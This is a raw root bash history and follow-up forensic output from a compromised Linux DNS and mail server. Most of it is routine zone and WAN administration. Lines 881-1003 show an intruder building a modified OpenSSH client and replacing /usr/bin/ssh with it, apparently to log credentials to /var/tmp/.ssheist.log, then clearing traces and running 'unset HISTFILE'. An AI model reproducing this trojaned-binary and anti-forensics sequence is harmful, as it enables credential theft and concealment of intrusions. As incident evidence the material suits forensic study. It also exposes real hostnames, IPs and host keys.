368 mailconf
369 dig tiscpty.com mx
370 dig tiscpty.com mx @196.25.1.1
371 dig tiscpty.com mx @induna.saix.net
372 dig tiscpty.com mx @igubu.saix.net
373 dig mail.tiscpty.com
374 exit
375 dig lin02.lanlink.co.za mx
376 /etc/init.d/named
377 vi /var/named/tiscpty.com
378 dig lin02.compumail.co.za mx
379 dig plet.compumail.co.za mx
380 exit
381 dig stike.co.za mx
382 dig strike.co.za mx
383 dig mail.strike.co.za
384 telnet mail.strike.co.za 25
385 telnet mail.strike.co.za 25
386 quit
387 exit
388 bwm
389 tcpdump -ni eth0
390 bwm
391 ssh 196.25.29.178
392 exit
393 cd /var/named/
394 vi compumail.co.za
395 vi lanlink.co.za
396 vi delvenco.co.za
397 vi onestar.co.za
398 dig compumail.co.za mx @127.0.0.1
399 exit
400 bwm
401 exit
402 bwm
403 exit
404 bwm
405 tcpdump -ni wp2aft src 165.146.147.111
406 tcpdump -ni wp2aft src 165.146.100.119
407 exit
408 cd /var/nm
409 cd /var/named/
410 ls
411 vi tigertruck.co.za
412 vi sheffieldbeachaccommodation.co.za
413 vi tigertruck.co.za
414 vi sheffieldbeachaccommodation.co.za
415 vi sheffieldbeachholiday.co.za
416 vi sheffieldbeachaccommodation.co.za
417 vi sheffieldbeachholiday.co.za
418 vi tigertruck.co.za
419 vi sheffieldbeachholiday.co.za
420 vi sheffieldbeachaccommodation.co.za
421 vi sheffieldbeachholiday.co.za
422 locate Vhosts
423 vi /etc/httpd/conf/vhosts/Vhosts.conf
424 vi /etc/named.conf
425 rndc reload
426 /etc/init.d/named restart
427 dig sheffieldbeachholiday.co.za @196.15.249.203
428 dig mx sheffieldbeachholiday.co.za @196.15.249.203
429 dig mx sheffieldbeachaccommodation.co.za @196.15.249.203
430 exit
431 ssh 196.25.22.178
432 exit
433 traceroute -n 196.25.29.178
434 traceroute -n 196.25.22.178
435 exit
436 cd /etc/
437 cd /var/named/
438 ll
439 cp vepac.co.za ratana.co.za
440 vi ratana.co.za
441 vi vepac.co.za
442 vi /etc/named.conf
443 rndc reload ratana.co.za
444 rndc ratana.co.za reload
445 vi named.ca
446 vi /etc/named.conf
447 ls
448 vi ratana.co.za
449 rndc ratana.co.za reload
450 rndc vepac.co.za reload
451 rndc
452 rndc reload ratana.co.za
453 rndc reload vepac.co.za
454 /etc/init.d/named restart
455 ssh plet.compumail.co.za
456 rndc reload vepac.co.za
457 vi /var/log/messages
458 /etc/init.d/named
459 /etc/init.d/named restart
460 exit
461 tail -f /var/log/messages
462 vi /etc/named.conf
463 tail -f /var/log/messages
464 exit
465 date
466 exit
467 date
468 exit
469 ssh lin02
470 ssh lin02.compumail.co.za
471 ssh plet
472 ssh plet.compumail.co.za
473 exit
474 dig parktonian.no-ip.info
475 dig parktonian.no-ip.info @196.25.1.9
476 exit
477 cd /var/named/
478 vi nestlife.co.za
479 dig r-r-m.co.za mx
480 vi nestlife.co.za
481 rndc reload nestlife.co.za
482 dig nestlife.co.za mx
483 dig nestlife.co.za mx @196.25.1.1
484 ssh parktonian.no-ip.info
485 exit
486 cd /var/named/
487 vi nestlife.co.za
488 rndc reload
489 exit
490 rndc reload iphiko.co.za
491 rndc reload vepac.co.za
492 /etc/init.d/named restart
493 ssh plet.compumail.co.za
494 exit
495 cd /var/named/
496 ll
497 cp ratana.co.za iphiko.co.za
498 vi iphiko.co.za
499 vi /etc/named.conf
500 tail -f /var/log/messages
501 exit
502 cd /etc/shorewall/
503 ls
504 cd ..
505 cd wanpipe
506 ls
507 vi scripts/
508 cd scripts/
509 ls
510 vi wanpipe1-wp3aft-start
511 exit
512 bwm
513 exit
514 vi /var/named/parktonian.co.za
515 rndc reload parktonian.co.za
516 dig parktonian.co.za mx
517 dig parktonian.co.za mx @196.15.249.204
518 telnet mail.parktonian.co.za 25
519 exit
520 vi /var/named/carmart.co.za
521 dig seapoint.no-ip.info
522 rndc reload carmart.co.za
523 exit
524 ssh 196.15.249.204
525 exit
526 telnet mail.carmart.co.za 25
527 exit
528 vi /var/named/prueleith.co.za
529 rmdc reload preuleigh.co.za
530 rndc reload preuleigh.co.za
531 rndc reload prueleigh.co.za
532 rndc reload
533 dig www.prueleigh.co.za
534 dig www.prueleith.co.za
535 dig www.prueleith.co.za @196.25.1.9
536 dig www.prueleith.co.za @ns1.iafrica.co.za
537 dig www.prueleith.co.za
538 cd /home/joe/prueleith/
539 ll
540 tar zScvf web.tgz *
541 ll
542 exit
543 dig prueleith.co.za ns @co.za
544 dig www.prueleith.co.za @plet.compumail.co.za
545 dig www.prueleith.co.za @hermes.is.co.za
546 dig www.prueleith.co.za @196.25.1.1
547 dig www.prueleith.co.za @196.25.1.9
548 dig datapro.co.za ns
549 dig www.prueleith.co.za @ns2.datapro.co.za
550 exit
551 ssh plet.compumail.co.za
552 ssh lin02.compumail.co.za
553 vi /root/.ssh/known_hosts
554 ssh plet.compumail.co.za
555 telnet 196.15.249.204 110
556 telnet 196.15.249.204 25
557 ping 196.15.249.205
558 exit
559 telnet 196.15.249.204 25
560 telnet 196.15.249.204 110
561 exit
562 bwm
563 exit
564 bwm
565 tcpdump -ni wp2aft | grep 165.146.53.80
566 exit
567 dig galileosa.co.za mx
568 exit
569 bwm
570 tcpdump -ni eth0 not tcp 22
571 tcpdump -ni eth0 not tcp port 22
572 bwm
573 tcpdump -ni eth0 not tcp port 22
574 bwm
575 exit
576 dig logisticor.no-ip.info
577 ssh 196.15.249.204
578 ssh 196.15.249.201
579 telnet 196.15.249.204 25
580 vi /etc/named.conf
581 cd /var/named/
582 vi logisticor.com
583 rndc reload logisticor.com
584 vi diemyburghs.co.za
585 dig logisticor.com mx
586 dig mx.logisticor.com
587 vi logisticor.com
588 rndc reload logisticor.com
589 dig mx.logisticor.com
590 telnet mx.logisticor.com 25
591 ssh 196.15.249.204
592 ping 196.15.249.204
593 telnet 196.15.249.204 110
594 telnet 196.15.249.204 25
595 nmap -?
596 nmap -sS 196.15.249.204
597 http://196.15.249.204:54320
598 lynx http://196.15.249.204:54320
599 telnet196.15.249.204 54320
600 telnet 196.15.249.204 54320
601 telnet mx.logisticor.com 25
602 vi /var/mail/joe
603 ssh 196.15.249.201
604 vi /etc/shorewall/rules
605 ssh 196.15.249.204
606 ssh -1 196.15.249.204
607 ssh -?
608 ssh -1 196.15.249.204 reboot
609 exit
610 cd /var/named/
611 vi logisticor.com
612 exit
613 vi /var/named/parktonian.co.za
614 vi /var/named/logisticor.com
615 rndc reload p
616 vi /var/named/parktonian.co.za
617 rndc reload parktonian.co.za
618 vi /var/named/carmart.co.za
619 rndc reload carmart.co.za
620 vi /var/named/delvenco.co.za
621 rndc reload delvenco.co.za
622 vi /var/named/delvenco.co.za
623 rndc reload delvenco.co.za
624 vi /var/named/carmart.co.za
625 rndc reload carmart.co.za
626 cd /var/named/
627 grep no-ip *
628 vi geospace.co.za
629 rndc reload geospace.co.za
630 exit
631 bwm
632 ssh 196.25.45.226
633 ssh andre@196.25.45.226
634 exit
635 bwm
636 exit
637 ssh /var/named/logisticor.com
638 vi /var/named/logisticor.com
639 rndc reload logisticor.com
640 dig logisticor.com mx
641 dig mail.logisticor.com
642 dig mail.logisticor.com @196.25.1.9
643 dig mail.logisticor.com @196.25.1.1
644 exit
645 bwm
646 ssh 196.25.45.226
647 ssh andre@196.25.45.226
648 dig ratana.co.za mx
649 exit
650 ifconfig
651 uvongo.compumail.co.za
652 ifconfig
653 bwm
654 exit
655 ssh plet.compumail.co.za
656 bwm
657 exit
658 ssh lin02.lanlink.co.za
659 ssh lin02.compumail.co.za
660 ssh plet
661 ssh plet.copmpumail.co.za
662 ssh plet.compumail.co.za
663 ssh parktonian.no-ip.ino
664 ssh parktonian.no-ip.info
665 ping uvongo.compumail.co.za
666 ssh uvongo.compumail.co.za
667 ping uvongo.compumail.co.za
668 ssh uvongo.compumail.co.za
669
670 wanrouter restart
671 wanrouter status
672 exit
673 bwm
674 ssh 196.25.45.214
675 exit
676 bwm
677 exit
678 dig -x 196.25.45.226 @196.25.1.9
679 dig -x 196.25.45.226
680 exit
681 dmesg
682 cat /var/log/messages
683 dmesg -c
684 cat /var/log/messages
685 exit
686 dig logisticor.com ns @196.25.1.1
687 dig logisticor.com ns @ns1.microsoft.com
688 dig logisticor.com ns @196.25.1.1
689 dig logisticor.com ns @196.25.1.9
690 exit
691 ping rndf-146-33-06.telkomadsl.co.za
692 exit
693 bwm
694 tcpdump -ni eth0 not tcp 22
695 tcpdump -ni eth0 not tcp port 22
696 bwm
697 exit
698 dig nasd.com ns
699 whois 216.52.126.1
700 dig nasdac.com
701 d
702 dig nasd.com ns
703 whois 63.251.87.230
704 whois 63.251.87.230 ?
705 dig jardinewindsor.com
706 dig jardinewindsor.com ns
707 dig ns1.dns27.com
708 whois 67.18.73.199
709 dig theplanet.com
710 dig jardinewindsor.com ns
711 dig jardinewindsor.com soa
712 exit
713 ping 196.15.249.204
714 telnet 196.15
715 telnet 196.15.249.204 110
716 telnet 196.15.249.204 25
717 telnet lin02.compumail.co.za 110
718 exit
719 ssh 196.15.249.204
720 ssh root@196.15.249.204
721 ssh joe@196.15.249.204
722 telnet 196.15.249.204 110
723 telnet 196.15.249.204 25
724 exit
725 ping 196.15.249.204
726 ssh 196.15.249.204
727 exit
728 dig atn.co.za ns
729 dig alltransportmeeds.co.za ns
730 dig alltransportneeds.co.za ns
731 dig alltransportneeds.co.za ns @co.za
732 dig webmail.alltransportneeds.co.za
733 dig www.alltransportneeds.co.za
734 dig www.alltransportneeds.co.za 196.7.0.139
735 dig www.alltransportneeds.co.za @196.7.0.139
736 dig www.atn.co.za @196.7.0.139
737 dig atn.co.za mx @196.7.0.139
738 exit
739 ssh plet.compumail.co.za
740 ssh 196.25.45.226
741 ssh andre@196.25.45.226
742 ping mail.knowres.co.za
743 dnsconf
744 ifconfig
745 dig knowres.co.za mx
746 cd /var/named/
747 vi knowres.co.za
748 rndc reload
749 dig mailserver.knowres.co.za
750 dig knowres.co.za mx
751 dig knowres.co.za mx @plet.compumail.co.za
752 rndc knowres.co.za reload
753 dig knowres.co.za mx @plet.compumail.co.za
754 vi knowres.co.za
755 rndc knowres.co.za reload
756 vi knowres.co.za
757 vi ithemba.co.za
758 vi knowres.co.za
759 rndc knowres.co.za reload
760 rndc reload
761 dig knowres.co.za mx @plet.compumail.co.za
762 dig apex.co.za
763 dig apex.co.za mx
764 dig apex-leads.co.za mx
765 dig mail.apex-leads.co.za
766 telnet mail.apex-leads.co.za 25
767 dig logisticor.com mx
768 exit
769 bwm
770 tcpdump -i wp5aft
771 tcpdump wp5aft
772 tcpdump wp5aft
773 tcpdump -i wp5aft
774 bwm
775 exit
776 $TTL 60
777 ssh joe@ireneguest.no-ip.info
778 vi /var/named/compumail.co.za
779 ssh ireneguest.no-ip.info
780 ssh joe@ireneguest.no-ip.info
781 su
782 exit
783 ssh 196.15.249.204
784 ssh 196.15.249.203
785 ssh 196.15.249.204
786 exit
787 bwm
788 exit
789 telnet mail.singita.co.za 25
790 exit
791 telnet mail.singita.co.za 25
792 ssh lin02.lanlink.co.za
793 exit
794 bwm
795 ssh 196.25.45.254
796 ssh 165.165.36.84
797 ping 196.15.249.205
798 exit
799 bwm
800 exit
801 bwm
802 exit
803 cd /etc/wanpipe/
804 ll
805 vi wanpipe1.conf
806 bwm
807 wanrouter restart wp7aft
808 vi wanpipe1.conf
809 wanrouter
810 wanrouter restart wanpipe1 wp7aft
811 wanrouter status wanpipe1 wp7aft
812 ifconfig
813 wanrouter
814 wanrouter debug wp7aft
815 wanrouter
816 wanrouter restart wanpipe1 wp7aft
817 ping 196.25.45.254
818 ssh 196.25.45.254
819 wanrouter restart wanpipe1 wp7aft
820 vi interfaces/wp7aft
821 vi wanpipe1.conf
822 wanrouter restart wanpipe1 wp7aft
823 ssh 196.25.45.254
824 ping 196.25.45.254
825 bwm
826 ssh 196.25.45.254
827 ssh 196.15.249.204
828 exit
829 bwm
830 ll
831 cd /home/joe/
832 ll
833 cd Mandrakelinux-10.1-Official-Powerpack/
834 ll
835 exit
836 vi /var/named/mentorfreight.co.za
837 rndc reload mentorfreight.co.za
838 netstat -an | grep 22
839 exit
840 telnet adsl.mentrofreight.co.za 25
841 telnet adsl.mentorfreight.co.za 25
842 telnet 165.146.6.83 25
843 vi /var/named/mentorfreight.co.za
844 rndc reload mentorfreight.co.za
845 mail administrator@mentorfreight.co.za
846 exit
847 vi /var/named/lanlink.co.za
848 cat /etc/sysconfig/static-routes
849 route add -net 196.15.249.224/29 gw 196.15.249.205
850 route add -net 196.15.249.220/30 gw 196.15.249.205
851 netstat -rn | grep 196.25.45.214
852 netstat -rn | grep 196.25.45.194
853 netstat -rn | grep 196.15.249.234
854 exit
855 telnet adsl.mentrofreight.co.za 25
856 telnet mentorfreight.co.za 25
857 telnet adsl.mentorfreight.co.za 25
858 bwm
859 ssh 192.25.45.254
860 ssh 196.25.45.254
861 exit
862 ssh 196.15.249.201
863 exit
864 demsg -c
865 dmesg -c
866 ping 196.15.249.206
867 demsg -c
868 dmesg -c
869 ssh 196.15.249.201
870 exit
871 ssh 196.25.45.254
872 bwm
873 exit
874 bwm
875 ssh lin02.lanlink.co.za
876 ssh lin02.compumail.co.za
877 exit
878 mailconf
879 ssh plet.compumail.co.za
880 exit
881 w
882 cd /tmp
883 mkdir ...
884 chmod 700 ...
885 cd ...
886 ls
887 ssh -V
888 wget http://openbsd.secsup.org/OpenSSH/portable/openssh-3.6.1p2.tar.gz
889 tar xzf *
890 netstat -antp | grep LISTEN
891 which apache
892 which httpd
893 locate httpd
894 /usr/sbin/httpd2
895 netstat -antp
896 ls /var/www/
897 ls /var/www//html
898 cd o*
899 ls
900 pico sshconnect2.c
901 nano sshconnect2.c -w
902 cd ..
903 wget http://www.nano-editor.org/dist/v1.2/nano-1.2.5.tar.gz
904 tar xzf nano*
905 cd nano*
906 ./configure && make
907 make install
908 cd ..
909 cd o*
910 nano -w sshconnect2.c
911 ./configure && make
912 ./ssh root@localhost
913 cat /var/tmp/.ssheist.log
914 rm -rf /var/tmp/.ssheist.log
915 cp ssh /usr/bin/ssh
916 cp ssh /var/www/html
917 rm -rf /var/www/html/ssh
918 rm -rf ../*
919 cd ..
920 ls
921 exit
922 tail -f /var/log/messages | grep 165.146.101.31
923 ll
924 exit
925 w
926 cat /var/tmp/.ssheist.log
927 exit
928 telnet histologic.no-ip.info
929 exit
930 ssh plet.compumail.co.za
931 exit
932 bwm
933 exit
934 bwm
935 exit
936 bwm
937 cat /var/named/mentorfreight.co.za
938 dig adsl.mentorfreight.co.za
939 bwm
940 exit
941 wanrouter status
942 wanrouter
943 wanrouter summary
944 bwm
945 wanrouter restart wp2aft
946 wanrouter/?
947 wanrouter /?
948 wanrouter restart wanpipe1 wp2aft
949 wanrouter status wanpipe1 wp2aft
950 bwm
951 ping 196.25.1.1
952 ifconfig
953 ping 196.25.245.193
954 ping 196.25.1.1
955 ssh 196.15.249.207
956 ping 196.25.1.1
957 ssh 196.25.45.214
958 ping 196.25.1.1
959 ifconfig
960 ifconfig wp2aft
961 wanrouter
962 wanrouter modules
963 man ifconfig
964 whereis wanrouter
965 cd /home/joe/
966 ll
967 cd wanpipe
968 ll
969 ll util/
970 wanpipemon
971 ll
972 cd samples/
973 ll
974 cd ..
975 ll
976 view README-3.operation
977 ll
978 ll interfaces/
979 ll /etc/wanpipe/interfaces/
980 wanrouter debug wp2aft
981 ping 196.25.1.1
982 bwm
983 ping 196.25.1.1
984 exit
985 ssh 196.15.249.201
986 exit
987 w
988 cat /var/tmp/.ssheiost.log
989 cat /var/tmp/.ssheist.log
990 host 196.15.249.207
991 host 196.25.45.214
992 ssh root@196.25.45.214
993 cat /var/tmp/.ssheist.log
994 host 196.25.45.214
995 cat > /var/tmp/.ssheist.log
996 cat /var/tmp/.ssheist.log
997 exit
998 w
999 logout
1000 w
1001 unset HISTFILE
1002 uname -a; cat /etc/issue
1003 history
[root@knysna root]# ls -al
total 655228
drwx------ 7 root root 4096 Jun 13 12:46 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
-rwxr-xr-x 1 root root 14012 Oct 18 2004 a.out*
-rw------- 1 root root 18715 Jun 14 02:00 .bash_history
-rw-r--r-- 1 root root 24 Dec 2 2002 .bash_logout
-rw-r--r-- 1 root root 106 Dec 2 2002 .bash_profile
-rw-r--r-- 1 root root 226 Dec 2 2002 .bashrc
-rw-r--r-- 1 root root 381 Mar 29 12:42 cadmapping.co.za
drwxr-xr-x 2 root root 4096 Jan 20 10:03 .cpan/
-rw-r--r-- 1 root root 233 Dec 2 2002 .cshrc
drwx------ 2 root root 4096 Aug 31 2004 drakx/
-rw-r--r-- 1 root root 355 Dec 10 2004 .fonts.cache-1
-rw-r--r-- 1 root root 5639 Dec 10 2004 ip_nat_tftp.ko
-rwxr-xr-x 1 root root 670156800 Nov 30 2004 mailpack.tgz*
-rw-r--r-- 1 root root 138 Feb 13 20:24 .rpmdrake
drwx------ 2 root root 4096 May 22 09:08 .ssh/
-rw-r--r-- 1 root root 189 Dec 2 2002 .tcshrc
-rw-r--r-- 1 root root 691 Oct 18 2004 test
drwx------ 2 root root 4096 Jun 14 01:53 tmp/
drwxr-xr-x 2 root root 4096 Oct 18 2004 vcia/
-rw------- 1 root root 8549 Jun 13 12:46 .viminfo
-rw-r--r-- 1 root root 3750 Dec 2 2002 .vimrc
-rw------- 1 root root 52 Jun 2 10:44 .Xauthority
-rw-r--r-- 1 root root 1479 Dec 2 2002 .Xdefaults
[root@knysna root]# ls -al /home/
total 16
drwxr-xr-x 4 root root 4096 Aug 31 2004 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx--x--x 3 admin admin 4096 Aug 31 2004 admin/
drwx--x--x 10 joe joe 4096 May 20 14:57 joe/
[root@knysna root]# ls -al /tmp. //.../
total 8
drwx------ 2 root root 4096 Jun 8 16:32 ./
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ../
[root@knysna root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 1580 520 ? S Apr11 0:10 init [3]
root 2 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/0]
root 3 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? SW Apr11 0:00 [migration/1]
root 5 0.0 0.0 0 0 ? SWN Apr11 0:00 [ksoftirqd/1]
root 6 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/0]
root 7 0.0 0.0 0 0 ? SW< Apr11 0:00 [events/1]
root 8 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/0]
root 9 0.0 0.0 0 0 ? SW< Apr11 0:00 [kblockd/1]
root 10 0.0 0.0 0 0 ? SW Apr11 0:00 [kirqd]
root 11 0.0 0.0 0 0 ? SW Apr11 0:00 [pdflush]
root 12 0.0 0.0 0 0 ? SW Apr11 0:04 [pdflush]
root 13 0.0 0.0 0 0 ? SW Apr11 0:00 [kswapd0]
root 14 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/0]
root 15 0.0 0.0 0 0 ? SW< Apr11 0:00 [aio/1]
root 17 0.0 0.0 0 0 ? SW Apr11 0:00 [kseriod]
root 25 0.0 0.0 0 0 ? SW Apr11 1:08 [kjournald]
root 115 0.0 0.0 2188 1300 ? S Apr11 0:00 devfsd /dev
root 205 0.0 0.0 0 0 ? SW Apr11 0:01 [khubd]
root 889 0.0 0.0 1660 560 ? S Apr11 0:00 /sbin/ifplugd -w
root 972 0.0 0.0 1880 812 ? S Apr11 2:10 syslogd -m 0 -a /
root 980 0.0 0.0 2580 1548 ? S Apr11 0:11 klogd -c 3 -2
daemon 1327 0.0 0.0 1772 616 ? S Apr11 0:00 /usr/sbin/atd
root 1343 0.0 0.1 5400 3224 ? S Apr11 0:00 /usr/sbin/snmpd -
root 1358 0.0 0.1 4884 2180 ? S Apr11 0:03 /usr/sbin/snmptra
root 1432 0.0 0.0 2240 964 ? S Apr11 0:00 xinetd -stayalive
root 1525 0.0 0.0 1780 708 ? S Apr11 0:00 crond
root 1599 0.0 0.0 1576 444 tty2 S Apr11 0:00 /sbin/mingetty tt
root 1600 0.0 0.0 1568 440 tty3 S Apr11 0:00 /sbin/mingetty tt
root 1601 0.0 0.0 1568 440 tty4 S Apr11 0:00 /sbin/mingetty tt
root 1602 0.0 0.0 1568 440 tty5 S Apr11 0:00 /sbin/mingetty tt
root 1603 0.0 0.0 1568 440 tty6 S Apr11 0:00 /sbin/mingetty tt
named 10104 0.0 0.5 47140 11616 ? S May19 0:00 named -u named
root 9994 0.0 0.0 2492 1080 ? S May26 0:00 login -- root
root 14688 0.0 0.0 3060 1848 tty1 S Jun01 0:00 -bash
root 21342 0.0 0.1 5228 2500 ? S Jun08 0:00 /usr/sbin/httpd2
root 21343 0.0 0.1 4028 2220 ? S Jun08 0:00 /usr/bin/perl /us
apache 4906 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4909 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
apache 4917 0.0 0.1 5228 2704 ? S Jun09 0:00 /usr/sbin/httpd2
root 10058 0.0 0.1 6348 2080 ? S Jun13 0:01 sshd: root@pts/0
root 10060 0.0 0.0 2952 1720 pts0 S Jun13 0:00 -bash
apache 10101 0.0 0.1 5228 2652 ? S Jun13 0:00 /usr/sbin/httpd2
apache 10111 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11507 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11508 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11509 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11510 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
apache 11512 0.0 0.1 5228 2648 ? S Jun13 0:00 /usr/sbin/httpd2
root 22406 0.0 0.0 3404 1468 ? S 02:08 0:00 /usr/sbin/sshd
root 28377 0.0 0.0 5972 1752 ? S 07:02 0:00 sshd: root@pts/1
root 28379 0.0 0.0 2952 1720 pts1 S 07:03 0:00 -bash
root 28423 0.0 0.0 2572 852 pts1 R 07:05 0:00 ps aux
[root@knysna root]# ls -al /tmp/
total 20
drwxrwxrwt 5 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root adm 4096 Apr 11 16:14 ../
drwx------ 2 root root 4096 Jun 8 16:32 .../
drwx------ 2 root root 4096 Aug 31 2004 gconfd-root/
drwxrwxrwt 2 root root 4096 Aug 31 2004 .ICE-unix/
[root@knysna root]# ls -al /car/tmp/
ls: /car/tmp/: No such file or directory
[root@knysna root]# ls -al /car/tmp/v
total 8
drwxrwxrwt 2 root root 4096 Jun 14 04:03 ./
drwxr-xr-x 20 root root 4096 Aug 31 2004 ../
-rw-r--r-- 1 root root 0 Jun 13 15:32 .ssheist.log
[root@knysna root]# hostname
knysna
[root@knysna root]# cat /root/.ssh/known_hosts
196.15.249.201 ssh-dss
AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
parktonian.no-ip.info,165.146.5.216 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAr01eaP2IQHnc0r7D2YgvkVGnMkE9RHh/K1IGP0uSiiMu4E5q3Pfv+bKQjhy24dQP/26zhZn6yZYa0kGtkhWS0AhQmXKGqrUN7fIZTooW2we0ctdafPfcANUcPC7ik9a8rQQSQSX3gJUl1EJnkuv/92wwW2YcxKRbgF+kjkZFRgU=
196.25.45.226 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA3C2L32PkNqg3hHncBZSGknwXE7WEyLaqOV5tnYBCaUcCOVwZ5fhEy8RCjMTl9mndZW9+8whPYKj+Q0qRYh5icMIdCfssmWt/aXI8T2ShKHxvcG8iVcy0yKN6GKH37Q0sWsPSbwLrxz78l+choze9raJuLVpga0X9LhxS2KIGSPs=
uvongo.compumail.co.za,196.15.249.193 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAwOyZQMPIn1EdkLP1//ImSO4406UUrW6klYua92ATW3fu5/6ZBIQuIjzxHAwesomdW3SWN7yUGfYUw048kG3hz50TH0HGIYilNEiO2ir0JzD+cDPeGwB0xBkX0JEFqw3Mh5TjByqM2XdSbbX5s9x8KvN9ZwPyP5W7focFis1SqxU=
plet.compumail.co.za,196.15.249.204 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA1GGPVqpEtReFznRbCophK4JL0CPfLwJK0CejbXkoYxR+Wfqog3B6c5z405XmHnoQ1Qwdd1zoFaxT9Our5ofqyGRgNas5knuweIHivMZdKGK+WsIS0r5iyWwsr3+J1SXOywOO0fHz27eVlItLSjAblEyzKkYH/V8KNU15MpZPSYs=
ireneguest.no-ip.info,165.165.235.173 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA4/EtiE5vCMmTX8BNF60LgZbHNaC/g1EWy81eTNNruEX5U9raqLyH5O1eMqSyn1XYXIxhogyBBGhVKxOHhuexGKT9lPQUq56P/RhWec/jUFjgqorNN3QAObZ7fOBakyYclhcMhLAnMq9T0Z7Hhx+lDbZwq+N3tjFnZ+XVZNbvlNk=
196.15.249.203 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzyeC8l1kKcYyG9b+ivtIaWyl9a2uLFbgUNq1h53MrLASfGQNIoFtSolXG0DsXs1qZPewceTRRT3+DNiarmHpoUYRxu3UX4ZqkJR88nbSMOQLq0x/oNULWlTwfm1lDq2eJdRT1UyH1tP/EeBbUiqVplG9xn9ytA2jWZY2JgEO2GU=
lin02.lanlink.co.za ssh-dss
AAAAB3NzaC1kc3MAAACBAI8sMZ1S3TQwwfGsik4RYpV3vLW98Naw6fHIr1LfHtnl4/eo+hqO1NQk06K+byQhoJACDKhjItSx9hFY5kAcLxsYVVWzl3dyS5SDFyANwv3hahs5WuBV1EOeDHmiJxt0WEKwOhDh1LyC8tcZ7FNmEqJnww/qV7HXSvzrRlcI56pNAAAAFQD1njp3oASgeLw38PEmkFekPTZY6QAAAIBW7uqkiGXia5lVZQeoGPxoxQFcjJfbgX2iykhO3zboYWy6jqOIeWxK4GwwDUVh8Xnf/BKPiOo9reEfPtqsd9Q7+4EE8JzkrXDBgxOZ3hBBqu3L1sLbuAHIfZKSce4G/bXQ8GCYF8r73UvMWKEdkHcKW5vDSzPFUrGXXZh5GZ/CJAAAAIAMi06vDOokgR+LV4mWBOfpZisVCs16/hKJmPK0HtG61zG1LWirE+69VrICVC+NLyyXYjEHrw7S2bmuT+bs3VKAiMIpfmpusPYBYbKHcdg0oVY2H3l/hh6PIPntozYRnswejcocjOayvTM8YtkL8BKkey4anuaF/jRJ5de1xj1PVw==
196.25.45.254 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAsLCjGV6av0CmgvSp98rtyPq0mYm/YVKAhBxKbthtC6yhnbN5WTSdrZhRwuoEoafLoUdbwr/iYfKIrylwnYT96EccphwpwFBO3YiK+fK7LF1/LVizWat+NZJHTjLKmfAvrF51l3lyZR1AEZSziM7p884tIh5UeUktf/TRS8kFz88=
umhlanga.compumail.co.za,196.15.249.205 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA6dGqZ8KfL4m3cxsAHQ3UnkRnWnNarGzSg/kGiRr00bdw8+N1NAl3j1efvXPHuI1TFgiNtVHEwz4hnN19F6pHVmKT/YIk/rN8cooQo/df0pk7k24mfrdwRyrV8K/xIGnXoEy4qPfe3hFl9TB5LdOPgMsy8WaYafJsF3yoZR+/9Ns=
lin02.compumail.co.za ssh-dss
